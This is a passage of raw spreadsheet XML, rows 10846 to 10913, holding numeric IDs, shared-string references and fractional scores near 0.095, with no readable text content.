      <c r="E10846" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10846" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="10847" ht="15.75" customHeight="1">
      <c r="A10847" s="1">
        <v>30457.0</v>
      </c>
      <c r="B10847" s="2">
        <v>3.9462503E7</v>
      </c>
      <c r="C10847" s="2" t="s">
        <v>10392</v>
      </c>
      <c r="D10847" s="2">
        <v>1.0</v>
      </c>
      <c r="E10847" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10847" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="10848" ht="15.75" customHeight="1">
      <c r="A10848" s="1">
        <v>1244.0</v>
      </c>
      <c r="B10848" s="2">
        <v>2.5096587E7</v>
      </c>
      <c r="C10848" s="2" t="s">
        <v>10393</v>
      </c>
      <c r="D10848" s="2">
        <v>1.0</v>
      </c>
      <c r="E10848" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10848" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10849" ht="15.75" customHeight="1">
      <c r="A10849" s="1">
        <v>1292.0</v>
      </c>
      <c r="B10849" s="2">
        <v>2.5593249E7</v>
      </c>
      <c r="C10849" s="2" t="s">
        <v>10394</v>
      </c>
      <c r="D10849" s="2">
        <v>1.0</v>
      </c>
      <c r="E10849" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10849" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10850" ht="15.75" customHeight="1">
      <c r="A10850" s="1">
        <v>1755.0</v>
      </c>
      <c r="B10850" s="2">
        <v>2.8894993E7</v>
      </c>
      <c r="C10850" s="2" t="s">
        <v>10395</v>
      </c>
      <c r="D10850" s="2">
        <v>1.0</v>
      </c>
      <c r="E10850" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10850" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10851" ht="15.75" customHeight="1">
      <c r="A10851" s="1">
        <v>2818.0</v>
      </c>
      <c r="B10851" s="2">
        <v>3.5386895E7</v>
      </c>
      <c r="C10851" s="2" t="s">
        <v>10396</v>
      </c>
      <c r="D10851" s="2">
        <v>1.0</v>
      </c>
      <c r="E10851" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10851" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10852" ht="15.75" customHeight="1">
      <c r="A10852" s="1">
        <v>2932.0</v>
      </c>
      <c r="B10852" s="2">
        <v>3.5916257E7</v>
      </c>
      <c r="C10852" s="2" t="s">
        <v>10397</v>
      </c>
      <c r="D10852" s="2">
        <v>1.0</v>
      </c>
      <c r="E10852" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10852" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10853" ht="15.75" customHeight="1">
      <c r="A10853" s="1">
        <v>4062.0</v>
      </c>
      <c r="B10853" s="2">
        <v>4.1147701E7</v>
      </c>
      <c r="C10853" s="2" t="s">
        <v>10398</v>
      </c>
      <c r="D10853" s="2">
        <v>1.0</v>
      </c>
      <c r="E10853" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10853" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10854" ht="15.75" customHeight="1">
      <c r="A10854" s="1">
        <v>5717.0</v>
      </c>
      <c r="B10854" s="2">
        <v>4.6586084E7</v>
      </c>
      <c r="C10854" s="2" t="s">
        <v>10399</v>
      </c>
      <c r="D10854" s="2">
        <v>1.0</v>
      </c>
      <c r="E10854" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10854" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10855" ht="15.75" customHeight="1">
      <c r="A10855" s="1">
        <v>6236.0</v>
      </c>
      <c r="B10855" s="2">
        <v>4.807582E7</v>
      </c>
      <c r="C10855" s="2" t="s">
        <v>10400</v>
      </c>
      <c r="D10855" s="2">
        <v>1.0</v>
      </c>
      <c r="E10855" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10855" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10856" ht="15.75" customHeight="1">
      <c r="A10856" s="1">
        <v>6436.0</v>
      </c>
      <c r="B10856" s="2">
        <v>4.8589915E7</v>
      </c>
      <c r="C10856" s="2" t="s">
        <v>10401</v>
      </c>
      <c r="D10856" s="2">
        <v>1.0</v>
      </c>
      <c r="E10856" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10856" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10857" ht="15.75" customHeight="1">
      <c r="A10857" s="1">
        <v>6439.0</v>
      </c>
      <c r="B10857" s="2">
        <v>4.8589915E7</v>
      </c>
      <c r="C10857" s="2" t="s">
        <v>10401</v>
      </c>
      <c r="D10857" s="2">
        <v>1.0</v>
      </c>
      <c r="E10857" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10857" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10858" ht="15.75" customHeight="1">
      <c r="A10858" s="1">
        <v>6909.0</v>
      </c>
      <c r="B10858" s="2">
        <v>4.9823117E7</v>
      </c>
      <c r="C10858" s="2" t="s">
        <v>10402</v>
      </c>
      <c r="D10858" s="2">
        <v>1.0</v>
      </c>
      <c r="E10858" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10858" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10859" ht="15.75" customHeight="1">
      <c r="A10859" s="1">
        <v>7697.0</v>
      </c>
      <c r="B10859" s="2">
        <v>5.1956929E7</v>
      </c>
      <c r="C10859" s="2" t="s">
        <v>10403</v>
      </c>
      <c r="D10859" s="2">
        <v>1.0</v>
      </c>
      <c r="E10859" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10859" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10860" ht="15.75" customHeight="1">
      <c r="A10860" s="1">
        <v>8204.0</v>
      </c>
      <c r="B10860" s="2">
        <v>5.3287731E7</v>
      </c>
      <c r="C10860" s="2" t="s">
        <v>10404</v>
      </c>
      <c r="D10860" s="2">
        <v>1.0</v>
      </c>
      <c r="E10860" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10860" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10861" ht="15.75" customHeight="1">
      <c r="A10861" s="1">
        <v>8654.0</v>
      </c>
      <c r="B10861" s="2">
        <v>5.4353711E7</v>
      </c>
      <c r="C10861" s="2" t="s">
        <v>10405</v>
      </c>
      <c r="D10861" s="2">
        <v>1.0</v>
      </c>
      <c r="E10861" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10861" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10862" ht="15.75" customHeight="1">
      <c r="A10862" s="1">
        <v>8971.0</v>
      </c>
      <c r="B10862" s="2">
        <v>5.4954966E7</v>
      </c>
      <c r="C10862" s="2" t="s">
        <v>10406</v>
      </c>
      <c r="D10862" s="2">
        <v>1.0</v>
      </c>
      <c r="E10862" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10862" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10863" ht="15.75" customHeight="1">
      <c r="A10863" s="1">
        <v>10009.0</v>
      </c>
      <c r="B10863" s="2">
        <v>5701591.0</v>
      </c>
      <c r="C10863" s="2" t="s">
        <v>10407</v>
      </c>
      <c r="D10863" s="2">
        <v>1.0</v>
      </c>
      <c r="E10863" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10863" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10864" ht="15.75" customHeight="1">
      <c r="A10864" s="1">
        <v>10567.0</v>
      </c>
      <c r="B10864" s="2">
        <v>1.2896002E7</v>
      </c>
      <c r="C10864" s="2" t="s">
        <v>10408</v>
      </c>
      <c r="D10864" s="2">
        <v>1.0</v>
      </c>
      <c r="E10864" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10864" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10865" ht="15.75" customHeight="1">
      <c r="A10865" s="1">
        <v>10587.0</v>
      </c>
      <c r="B10865" s="2">
        <v>1.3310957E7</v>
      </c>
      <c r="C10865" s="2" t="s">
        <v>10409</v>
      </c>
      <c r="D10865" s="2">
        <v>1.0</v>
      </c>
      <c r="E10865" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10865" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10866" ht="15.75" customHeight="1">
      <c r="A10866" s="1">
        <v>11077.0</v>
      </c>
      <c r="B10866" s="2">
        <v>1841502.0</v>
      </c>
      <c r="C10866" s="2" t="s">
        <v>10410</v>
      </c>
      <c r="D10866" s="2">
        <v>1.0</v>
      </c>
      <c r="E10866" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10866" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10867" ht="15.75" customHeight="1">
      <c r="A10867" s="1">
        <v>11889.0</v>
      </c>
      <c r="B10867" s="2">
        <v>2.5096984E7</v>
      </c>
      <c r="C10867" s="2" t="s">
        <v>10411</v>
      </c>
      <c r="D10867" s="2">
        <v>1.0</v>
      </c>
      <c r="E10867" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10867" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10868" ht="15.75" customHeight="1">
      <c r="A10868" s="1">
        <v>11945.0</v>
      </c>
      <c r="B10868" s="2">
        <v>2.5541274E7</v>
      </c>
      <c r="C10868" s="2" t="s">
        <v>10412</v>
      </c>
      <c r="D10868" s="2">
        <v>1.0</v>
      </c>
      <c r="E10868" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10868" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10869" ht="15.75" customHeight="1">
      <c r="A10869" s="1">
        <v>12873.0</v>
      </c>
      <c r="B10869" s="2">
        <v>3.1936675E7</v>
      </c>
      <c r="C10869" s="2" t="s">
        <v>10413</v>
      </c>
      <c r="D10869" s="2">
        <v>1.0</v>
      </c>
      <c r="E10869" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10869" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10870" ht="15.75" customHeight="1">
      <c r="A10870" s="1">
        <v>13146.0</v>
      </c>
      <c r="B10870" s="2">
        <v>3.3786254E7</v>
      </c>
      <c r="C10870" s="2" t="s">
        <v>10414</v>
      </c>
      <c r="D10870" s="2">
        <v>1.0</v>
      </c>
      <c r="E10870" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10870" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10871" ht="15.75" customHeight="1">
      <c r="A10871" s="1">
        <v>13502.0</v>
      </c>
      <c r="B10871" s="2">
        <v>3.5431383E7</v>
      </c>
      <c r="C10871" s="2" t="s">
        <v>10415</v>
      </c>
      <c r="D10871" s="2">
        <v>1.0</v>
      </c>
      <c r="E10871" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10871" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10872" ht="15.75" customHeight="1">
      <c r="A10872" s="1">
        <v>14315.0</v>
      </c>
      <c r="B10872" s="2">
        <v>3.8673412E7</v>
      </c>
      <c r="C10872" s="2" t="s">
        <v>10416</v>
      </c>
      <c r="D10872" s="2">
        <v>1.0</v>
      </c>
      <c r="E10872" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10872" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10873" ht="15.75" customHeight="1">
      <c r="A10873" s="1">
        <v>14646.0</v>
      </c>
      <c r="B10873" s="2">
        <v>4.0365997E7</v>
      </c>
      <c r="C10873" s="2" t="s">
        <v>10417</v>
      </c>
      <c r="D10873" s="2">
        <v>1.0</v>
      </c>
      <c r="E10873" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10873" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10874" ht="15.75" customHeight="1">
      <c r="A10874" s="1">
        <v>15800.0</v>
      </c>
      <c r="B10874" s="2">
        <v>4.4215522E7</v>
      </c>
      <c r="C10874" s="2" t="s">
        <v>10418</v>
      </c>
      <c r="D10874" s="2">
        <v>1.0</v>
      </c>
      <c r="E10874" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10874" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10875" ht="15.75" customHeight="1">
      <c r="A10875" s="1">
        <v>16699.0</v>
      </c>
      <c r="B10875" s="2">
        <v>4.7390289E7</v>
      </c>
      <c r="C10875" s="2" t="s">
        <v>10419</v>
      </c>
      <c r="D10875" s="2">
        <v>1.0</v>
      </c>
      <c r="E10875" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10875" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10876" ht="15.75" customHeight="1">
      <c r="A10876" s="1">
        <v>18133.0</v>
      </c>
      <c r="B10876" s="2">
        <v>5.1814187E7</v>
      </c>
      <c r="C10876" s="2" t="s">
        <v>10420</v>
      </c>
      <c r="D10876" s="2">
        <v>1.0</v>
      </c>
      <c r="E10876" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10876" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10877" ht="15.75" customHeight="1">
      <c r="A10877" s="1">
        <v>18527.0</v>
      </c>
      <c r="B10877" s="2">
        <v>5.3076323E7</v>
      </c>
      <c r="C10877" s="2" t="s">
        <v>10421</v>
      </c>
      <c r="D10877" s="2">
        <v>1.0</v>
      </c>
      <c r="E10877" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10877" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10878" ht="15.75" customHeight="1">
      <c r="A10878" s="1">
        <v>18677.0</v>
      </c>
      <c r="B10878" s="2">
        <v>5.3561707E7</v>
      </c>
      <c r="C10878" s="2" t="s">
        <v>10422</v>
      </c>
      <c r="D10878" s="2">
        <v>1.0</v>
      </c>
      <c r="E10878" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10878" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10879" ht="15.75" customHeight="1">
      <c r="A10879" s="1">
        <v>19280.0</v>
      </c>
      <c r="B10879" s="2">
        <v>5.5161602E7</v>
      </c>
      <c r="C10879" s="2" t="s">
        <v>10423</v>
      </c>
      <c r="D10879" s="2">
        <v>1.0</v>
      </c>
      <c r="E10879" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10879" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10880" ht="15.75" customHeight="1">
      <c r="A10880" s="1">
        <v>19410.0</v>
      </c>
      <c r="B10880" s="2">
        <v>5.5596595E7</v>
      </c>
      <c r="C10880" s="2" t="s">
        <v>10424</v>
      </c>
      <c r="D10880" s="2">
        <v>1.0</v>
      </c>
      <c r="E10880" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10880" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10881" ht="15.75" customHeight="1">
      <c r="A10881" s="1">
        <v>19770.0</v>
      </c>
      <c r="B10881" s="2">
        <v>5.6764002E7</v>
      </c>
      <c r="C10881" s="2" t="s">
        <v>10425</v>
      </c>
      <c r="D10881" s="2">
        <v>1.0</v>
      </c>
      <c r="E10881" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10881" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10882" ht="15.75" customHeight="1">
      <c r="A10882" s="1">
        <v>20621.0</v>
      </c>
      <c r="B10882" s="2">
        <v>1.4035756E7</v>
      </c>
      <c r="C10882" s="2" t="s">
        <v>10426</v>
      </c>
      <c r="D10882" s="2">
        <v>1.0</v>
      </c>
      <c r="E10882" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10882" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10883" ht="15.75" customHeight="1">
      <c r="A10883" s="1">
        <v>21679.0</v>
      </c>
      <c r="B10883" s="2">
        <v>2.5054797E7</v>
      </c>
      <c r="C10883" s="2" t="s">
        <v>10427</v>
      </c>
      <c r="D10883" s="2">
        <v>1.0</v>
      </c>
      <c r="E10883" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10883" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10884" ht="15.75" customHeight="1">
      <c r="A10884" s="1">
        <v>21789.0</v>
      </c>
      <c r="B10884" s="2">
        <v>2.6608259E7</v>
      </c>
      <c r="C10884" s="2" t="s">
        <v>10428</v>
      </c>
      <c r="D10884" s="2">
        <v>1.0</v>
      </c>
      <c r="E10884" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10884" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10885" ht="15.75" customHeight="1">
      <c r="A10885" s="1">
        <v>21828.0</v>
      </c>
      <c r="B10885" s="2">
        <v>2.698612E7</v>
      </c>
      <c r="C10885" s="2" t="s">
        <v>10429</v>
      </c>
      <c r="D10885" s="2">
        <v>1.0</v>
      </c>
      <c r="E10885" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10885" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10886" ht="15.75" customHeight="1">
      <c r="A10886" s="1">
        <v>21928.0</v>
      </c>
      <c r="B10886" s="2">
        <v>2.8475544E7</v>
      </c>
      <c r="C10886" s="2" t="s">
        <v>10430</v>
      </c>
      <c r="D10886" s="2">
        <v>1.0</v>
      </c>
      <c r="E10886" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10886" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10887" ht="15.75" customHeight="1">
      <c r="A10887" s="1">
        <v>23015.0</v>
      </c>
      <c r="B10887" s="2">
        <v>4986299.0</v>
      </c>
      <c r="C10887" s="2" t="s">
        <v>10431</v>
      </c>
      <c r="D10887" s="2">
        <v>1.0</v>
      </c>
      <c r="E10887" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10887" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10888" ht="15.75" customHeight="1">
      <c r="A10888" s="1">
        <v>23074.0</v>
      </c>
      <c r="B10888" s="2">
        <v>5.0501369E7</v>
      </c>
      <c r="C10888" s="2" t="s">
        <v>10432</v>
      </c>
      <c r="D10888" s="2">
        <v>1.0</v>
      </c>
      <c r="E10888" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10888" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10889" ht="15.75" customHeight="1">
      <c r="A10889" s="1">
        <v>23906.0</v>
      </c>
      <c r="B10889" s="2">
        <v>8489082.0</v>
      </c>
      <c r="C10889" s="2" t="s">
        <v>10433</v>
      </c>
      <c r="D10889" s="2">
        <v>1.0</v>
      </c>
      <c r="E10889" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10889" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10890" ht="15.75" customHeight="1">
      <c r="A10890" s="1">
        <v>25487.0</v>
      </c>
      <c r="B10890" s="2">
        <v>1.4035755E7</v>
      </c>
      <c r="C10890" s="2" t="s">
        <v>10426</v>
      </c>
      <c r="D10890" s="2">
        <v>1.0</v>
      </c>
      <c r="E10890" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10890" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10891" ht="15.75" customHeight="1">
      <c r="A10891" s="1">
        <v>25868.0</v>
      </c>
      <c r="B10891" s="2">
        <v>1.4894842E7</v>
      </c>
      <c r="C10891" s="2" t="s">
        <v>10434</v>
      </c>
      <c r="D10891" s="2">
        <v>1.0</v>
      </c>
      <c r="E10891" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10891" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10892" ht="15.75" customHeight="1">
      <c r="A10892" s="1">
        <v>25969.0</v>
      </c>
      <c r="B10892" s="2">
        <v>1.5277916E7</v>
      </c>
      <c r="C10892" s="2" t="s">
        <v>10435</v>
      </c>
      <c r="D10892" s="2">
        <v>1.0</v>
      </c>
      <c r="E10892" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10892" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10893" ht="15.75" customHeight="1">
      <c r="A10893" s="1">
        <v>28214.0</v>
      </c>
      <c r="B10893" s="2">
        <v>2.5054796E7</v>
      </c>
      <c r="C10893" s="2" t="s">
        <v>10427</v>
      </c>
      <c r="D10893" s="2">
        <v>1.0</v>
      </c>
      <c r="E10893" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10893" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10894" ht="15.75" customHeight="1">
      <c r="A10894" s="1">
        <v>30262.0</v>
      </c>
      <c r="B10894" s="2">
        <v>3.7623189E7</v>
      </c>
      <c r="C10894" s="2" t="s">
        <v>10436</v>
      </c>
      <c r="D10894" s="2">
        <v>1.0</v>
      </c>
      <c r="E10894" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10894" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10895" ht="15.75" customHeight="1">
      <c r="A10895" s="1">
        <v>31899.0</v>
      </c>
      <c r="B10895" s="2">
        <v>5.2955382E7</v>
      </c>
      <c r="C10895" s="2" t="s">
        <v>10437</v>
      </c>
      <c r="D10895" s="2">
        <v>1.0</v>
      </c>
      <c r="E10895" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10895" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10896" ht="15.75" customHeight="1">
      <c r="A10896" s="1">
        <v>32249.0</v>
      </c>
      <c r="B10896" s="2">
        <v>5.5077632E7</v>
      </c>
      <c r="C10896" s="2" t="s">
        <v>10438</v>
      </c>
      <c r="D10896" s="2">
        <v>1.0</v>
      </c>
      <c r="E10896" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10896" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10897" ht="15.75" customHeight="1">
      <c r="A10897" s="1">
        <v>34260.0</v>
      </c>
      <c r="B10897" s="2">
        <v>8043952.0</v>
      </c>
      <c r="C10897" s="2" t="s">
        <v>10439</v>
      </c>
      <c r="D10897" s="2">
        <v>1.0</v>
      </c>
      <c r="E10897" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10897" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10898" ht="15.75" customHeight="1">
      <c r="A10898" s="1">
        <v>34266.0</v>
      </c>
      <c r="B10898" s="2">
        <v>8054342.0</v>
      </c>
      <c r="C10898" s="2" t="s">
        <v>10440</v>
      </c>
      <c r="D10898" s="2">
        <v>1.0</v>
      </c>
      <c r="E10898" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10898" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="10899" ht="15.75" customHeight="1">
      <c r="A10899" s="1">
        <v>120.0</v>
      </c>
      <c r="B10899" s="2">
        <v>1.3016607E7</v>
      </c>
      <c r="C10899" s="2" t="s">
        <v>10441</v>
      </c>
      <c r="D10899" s="2">
        <v>1.0</v>
      </c>
      <c r="E10899" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10899" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="10900" ht="15.75" customHeight="1">
      <c r="A10900" s="1">
        <v>364.0</v>
      </c>
      <c r="B10900" s="2">
        <v>1.6231977E7</v>
      </c>
      <c r="C10900" s="2" t="s">
        <v>10442</v>
      </c>
      <c r="D10900" s="2">
        <v>1.0</v>
      </c>
      <c r="E10900" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10900" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="10901" ht="15.75" customHeight="1">
      <c r="A10901" s="1">
        <v>2441.0</v>
      </c>
      <c r="B10901" s="2">
        <v>3.3689729E7</v>
      </c>
      <c r="C10901" s="2" t="s">
        <v>10443</v>
      </c>
      <c r="D10901" s="2">
        <v>1.0</v>
      </c>
      <c r="E10901" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10901" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="10902" ht="15.75" customHeight="1">
      <c r="A10902" s="1">
        <v>7434.0</v>
      </c>
      <c r="B10902" s="2">
        <v>5.1193713E7</v>
      </c>
      <c r="C10902" s="2" t="s">
        <v>10444</v>
      </c>
      <c r="D10902" s="2">
        <v>1.0</v>
      </c>
      <c r="E10902" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10902" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="10903" ht="15.75" customHeight="1">
      <c r="A10903" s="1">
        <v>7799.0</v>
      </c>
      <c r="B10903" s="2">
        <v>5.220815E7</v>
      </c>
      <c r="C10903" s="2" t="s">
        <v>10445</v>
      </c>
      <c r="D10903" s="2">
        <v>1.0</v>
      </c>
      <c r="E10903" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10903" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="10904" ht="15.75" customHeight="1">
      <c r="A10904" s="1">
        <v>10753.0</v>
      </c>
      <c r="B10904" s="2">
        <v>1.5478727E7</v>
      </c>
      <c r="C10904" s="2" t="s">
        <v>10446</v>
      </c>
      <c r="D10904" s="2">
        <v>1.0</v>
      </c>
      <c r="E10904" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10904" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="10905" ht="15.75" customHeight="1">
      <c r="A10905" s="1">
        <v>16069.0</v>
      </c>
      <c r="B10905" s="2">
        <v>4.5306999E7</v>
      </c>
      <c r="C10905" s="2" t="s">
        <v>10447</v>
      </c>
      <c r="D10905" s="2">
        <v>1.0</v>
      </c>
      <c r="E10905" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10905" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="10906" ht="15.75" customHeight="1">
      <c r="A10906" s="1">
        <v>23002.0</v>
      </c>
      <c r="B10906" s="2">
        <v>4.9746253E7</v>
      </c>
      <c r="C10906" s="2" t="s">
        <v>10448</v>
      </c>
      <c r="D10906" s="2">
        <v>1.0</v>
      </c>
      <c r="E10906" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10906" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="10907" ht="15.75" customHeight="1">
      <c r="A10907" s="1">
        <v>31048.0</v>
      </c>
      <c r="B10907" s="2">
        <v>4.7946062E7</v>
      </c>
      <c r="C10907" s="2" t="s">
        <v>10449</v>
      </c>
      <c r="D10907" s="2">
        <v>1.0</v>
      </c>
      <c r="E10907" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10907" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="10908" ht="15.75" customHeight="1">
      <c r="A10908" s="1">
        <v>30088.0</v>
      </c>
      <c r="B10908" s="2">
        <v>3632558.0</v>
      </c>
      <c r="C10908" s="2" t="s">
        <v>10450</v>
      </c>
      <c r="D10908" s="2">
        <v>1.0</v>
      </c>
      <c r="E10908" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10908" s="2">
        <v>0.09562841530054644</v>
      </c>
    </row>
    <row r="10909" ht="15.75" customHeight="1">
      <c r="A10909" s="1">
        <v>6729.0</v>
      </c>
      <c r="B10909" s="2">
        <v>4.9317551E7</v>
      </c>
      <c r="C10909" s="2" t="s">
        <v>10451</v>
      </c>
      <c r="D10909" s="2">
        <v>1.0</v>
      </c>
      <c r="E10909" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10909" s="2">
        <v>0.09538784067085956</v>
      </c>
    </row>
    <row r="10910" ht="15.75" customHeight="1">
      <c r="A10910" s="1">
        <v>34020.0</v>
      </c>
      <c r="B10910" s="2">
        <v>9512074.0</v>
      </c>
      <c r="C10910" s="2" t="s">
        <v>10452</v>
      </c>
      <c r="D10910" s="2">
        <v>1.0</v>
      </c>
      <c r="E10910" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10910" s="2">
        <v>0.09508547008547007</v>
      </c>
    </row>
    <row r="10911" ht="15.75" customHeight="1">
      <c r="A10911" s="1">
        <v>1367.0</v>
      </c>
      <c r="B10911" s="2">
        <v>2.6012138E7</v>
      </c>
      <c r="C10911" s="2" t="s">
        <v>10453</v>
      </c>
      <c r="D10911" s="2">
        <v>1.0</v>
      </c>
      <c r="E10911" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10911" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="10912" ht="15.75" customHeight="1">
      <c r="A10912" s="1">
        <v>2503.0</v>
      </c>
      <c r="B10912" s="2">
        <v>3.393992E7</v>
      </c>
      <c r="C10912" s="2" t="s">
        <v>10454</v>
      </c>
      <c r="D10912" s="2">
        <v>1.0</v>
      </c>
      <c r="E10912" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10912" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="10913" ht="15.75" customHeight="1">
      <c r="A10913" s="1">
        <v>3405.0</v>
      </c>
      <c r="B10913" s="2">
        <v>3.8032212E7</v>
      </c>
      <c r="C10913" s="2" t="s">
        <v>10455</v>
      </c>
      <c r="D10913" s="2">
        <v>1.0</v>
      </c>
      <c r="E10913" s="3" t="s">
